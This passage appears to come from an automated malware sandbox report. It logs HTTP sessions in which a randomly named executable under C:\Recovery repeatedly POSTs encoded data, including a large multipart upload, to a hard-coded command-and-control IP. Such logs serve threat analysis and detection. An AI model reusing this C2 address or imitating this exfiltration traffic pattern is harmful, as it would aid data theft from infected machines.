                                                                                          9 | 192.168.2.8 | 49723 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:22.113157034 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:22.460975885 CET | 2004 | OUT | Data Raw: (encoded payload)
                                                                                          Dec 10, 2024 07:28:23.374237061 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:23.609082937 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:23 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          10 | 192.168.2.8 | 49724 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:22.351869106 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:22.711570978 CET | 2512 | OUT | Data Raw: (encoded payload)
                                                                                          Dec 10, 2024 07:28:23.618660927 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:23.852926016 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:23 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          11 | 192.168.2.8 | 49726 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:24.301578999 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:24.648294926 CET | 2512 | OUT | Data Raw: (encoded payload)
                                                                                          Dec 10, 2024 07:28:25.550352097 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:25.786278009 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:25 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          12 | 192.168.2.8 | 49727 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:27.016736984 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:27.377964973 CET | 2512 | OUT | Data Raw: (encoded payload)
                                                                                          Dec 10, 2024 07:28:28.277115107 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:28.512897015 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:28 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0
                                                                                          Dec 10, 2024 07:28:28.961282969 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:29.319823027 CET | 2004 | OUT | Data Raw: 57 5a 5a 59 5b 5b 50 5e 58 57 5a 57 52 54 51 57 5b 5d 5d 44 57 50 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WZZY[[P^XWZWRTQW[]]DWPP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"2Z#&5&=.3??38W5.=]<,S*;%Y728-9.\%!Z+
                                                                                          Dec 10, 2024 07:28:29.362890959 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:29.726533890 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:29 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 12 23 29 0d 5d 32 1d 20 54 38 08 27 1e 31 03 02 18 2a 1c 29 07 25 38 2b 17 2d 0c 37 56 3d 3d 2a 04 3c 3a 20 54 29 11 28 0e 27 1f 21 46 0c 1d 24 58 24 38 32 16 25 3d 20 00 24 01 0e 06 33 31 20 01 3e 33 24 53 23 33 33 5d 27 0d 24 56 2d 3e 35 0f 38 0b 2e 09 29 31 29 0b 32 02 22 57 0d 12 24 0b 32 56 22 00 22 21 21 0d 35 1f 20 53 3c 25 0d 04 33 3e 2f 5a 22 03 39 10 24 32 24 58 22 34 20 13 3f 02 22 5c 25 2e 3e 50 24 11 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%#)]2 T8'1*)%8+-7V==*<: T)('!F$X$82%= $31 >3$S#33]'$V->58.)1)2"W$2V""!!5 S<%3>/Z"9$2$X"4 ?"\%.>P$ ^*+U?WT0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          13 | 192.168.2.8 | 49728 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:29.257258892 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:29.616718054 CET | 2512 | OUT | Data Raw: 52 5e 5a 5e 5b 5f 50 59 58 57 5a 57 52 54 51 5c 5b 5a 5d 45 57 5e 50 5f 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R^Z^[_PYXWZWRTQ\[Z]EW^P_^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%4_#*Q"!Z).7]0(0*45-+8 Q)+" !#\.9.\%!Z+
                                                                                          Dec 10, 2024 07:28:30.521306992 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:30.756982088 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0
                                                                                          Dec 10, 2024 07:28:30.759257078 CET | 366 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: multipart/form-data; boundary=----nCS53NPw2nKhZqltAC7D5xETwvhPigkYiE
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 115942
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:31.149560928 CET | 14832 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 6e 43 53 35 33 4e 50 77 32 6e 4b 68 5a 71 6c 74 41 43 37 44 35 78 45 54 77 76 68 50 69 67 6b 59 69 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                          Data Ascii: ------nCS53NPw2nKhZqltAC7D5xETwvhPigkYiEContent-Disposition: form-data; name="0"Content-Type: text/plainR]Z_^UPZXWZWRTQR[Q]FWSPU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^
                                                                                          Dec 10, 2024 07:28:31.162069082 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:32.087762117 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:31 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          14 | 192.168.2.8 | 49729 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:31.051948071 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:31.581491947 CET | 2512 | OUT | Data Raw: 52 5c 5a 5d 5e 5a 55 58 58 57 5a 57 52 54 51 51 5b 5f 5d 47 57 53 50 54 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\Z]^ZUXXWZWRTQQ[_]GWSPT^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"275!&%=.,$?4Y398V6!Z<+$R=8=_#T'\9.\%!Z+
                                                                                          Dec 10, 2024 07:28:32.303925991 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:32.537039995 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:32 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          15 | 192.168.2.8 | 49730 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:32.786464930 CET | 320 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:33.132388115 CET | 2504 | OUT | Data Raw: 57 5b 5a 59 5e 55 55 5e 58 57 5a 57 52 55 51 50 5b 5a 5d 42 57 50 50 58 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W[ZY^UU^XWZWRUQP[Z]BWPPX^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&/#:5!6)7'Y(]$*U5>2<8Q="4"0-).\%!Z+4
                                                                                          Dec 10, 2024 07:28:34.053833961 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:34.285051107 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:33 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          16 | 192.168.2.8 | 49731 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:35.593307972 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:35.946928978 CET | 2512 | OUT | Data Raw: 52 5d 5a 5d 5e 58 55 58 58 57 5a 57 52 57 51 52 5b 5b 5d 43 57 56 50 59 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R]Z]^XUXXWZWRWQR[[]CWVPY^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"_2/,]!:""%*>$<'0:+ .<3++^#";..\%!Z+,
                                                                                          Dec 10, 2024 07:28:36.855150938 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:37.089068890 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:36 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          17 | 192.168.2.8 | 49732 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:35.593776941 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1984
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:35.944762945 CET | 1984 | OUT | Data Raw: 57 5a 5f 52 5e 58 50 5a 58 57 5a 57 52 5c 51 5c 5b 59 5d 47 57 55 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WZ_R^XPZXWZWR\Q\[Y]GWUP[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!1<? :)6&5_)=+]';%*!-9(P+;)[ !8:).\%!Z+
                                                                                          Dec 10, 2024 07:28:36.855185032 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:37.088996887 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:36 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 59 23 5f 37 11 25 23 30 55 38 08 3b 51 26 3e 23 45 2a 54 3a 5c 25 16 27 19 3a 0c 09 1c 2a 03 04 03 3c 2a 0a 57 29 11 0e 0c 30 0f 21 46 0c 1d 27 04 26 2b 21 01 24 04 33 5d 24 06 23 10 33 21 20 01 29 0a 3b 0c 34 0d 27 5f 27 33 3b 0c 3b 3d 29 0d 2f 36 22 45 2b 21 2e 1f 25 38 22 57 0d 12 27 51 24 30 2a 07 23 32 3a 1c 21 22 3f 0f 2b 26 3b 04 27 58 27 12 21 3a 35 11 33 0f 28 1d 20 37 3c 5e 2b 15 3a 5c 31 04 26 1b 33 2b 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%Y#_7%#0U8;Q&>#E*T:\%':*<*W)0!F'&+!$3]$#3! );4'_'3;;=)/6"E+!.%8"W'Q$0*#2:!"?+&;'X'!:53( 7<^+:\1&3+ ^*+U?WT0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          18 | 192.168.2.8 | 49733 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:37.427737951 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:37.772810936 CET | 2512 | OUT | Data Raw: 57 5c 5a 59 5e 5e 55 5b 58 57 5a 57 52 5d 51 51 5b 5a 5d 48 57 50 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\ZY^^U[XWZWR]QQ[Z]HWPP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!'/( :>59*>/0,+3;!=!](;*5 ?[.9.\%!Z+
                                                                                          Dec 10, 2024 07:28:38.685293913 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:38.920800924 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:38 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          19 | 192.168.2.8 | 49734 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:39.202027082 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:39.642179966 CET | 2512 | OUT
                                                                                          Dec 10, 2024 07:28:40.463282108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:40.701029062 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:40 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          20 | 192.168.2.8 | 49736 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:40.946151972 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:41.310215950 CET | 2512 | OUT
                                                                                          Dec 10, 2024 07:28:42.198590040 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:42.432786942 CET | 200 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:42 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          21 | 192.168.2.8 | 49737 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Dec 10, 2024 07:28:42.928108931 CET | 344 | OUT | POST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 1992
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:43.272787094 CET | 1992 | OUT
                                                                                          Dec 10, 2024 07:28:44.153390884 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:44.389072895 CET | 349 | IN | HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          22 | 192.168.2.8 | 49738 | 147.45.47.151 | 80 | 1296 | C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
